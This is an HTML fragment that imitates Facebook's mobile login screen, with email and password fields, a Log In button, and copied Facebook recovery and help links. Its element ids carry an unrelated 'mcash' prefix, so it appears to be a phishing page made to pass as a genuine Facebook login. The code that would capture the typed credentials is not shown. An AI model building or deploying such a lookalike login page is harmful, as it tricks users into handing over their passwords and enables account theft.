<div class="root-container-login">

    <div class="mcash-login-header">
        <u>facebook</u>
    </div>

    <div class="mcash-login-form">

        <div class="field">
            <p class="control has-icons-left">
                <input id="mcash-email" class="input is-info" type="text" placeholder="Email address or phone number"/>
            </p>
        </div>

        <div class="field">
            <p class="control has-icons-left">
                <input id="mcash-pass" class="input is-info" type="password" placeholder="Password"/>
            </p>
        </div>

        <button id="mcash-login-form-btn">Log In</button>

    </div>


    <div data-sigil="m_login_more_links">
        <div class="other-links">
            <ul class="_5pkb _55wp">
                <li>
                    <span class="mfss fcg">
                        <a
                            href="/recover/initiate/?c=https%3A%2F%2Fm.facebook.com%2F%3Fstype%3Dlo%26jlou%3DAff_eRRXVvUCbqMWRz8grrtVaACDWTYr7lnmO2geA7kLTU7r_FmmYiVI3N0gxwdfFcOcgqO5J90kzCSh4-sWIoCrZLY7Wpgvdm05bqctm779XQ%26smuh%3D34488%26lh%3DAc9VhE1aGqxY4xsj&amp;lwv=101&amp;refid=8"
                            id="forgot-password-link">Forgotten password?
                        </a>
                        <span aria-hidden="true"> · </span>
                        <a class ="sec" href="/help/?refid=8" id="help-link">Help Centre</a>
                    </span></li>
            </ul>
        </div>
    </div>


</div>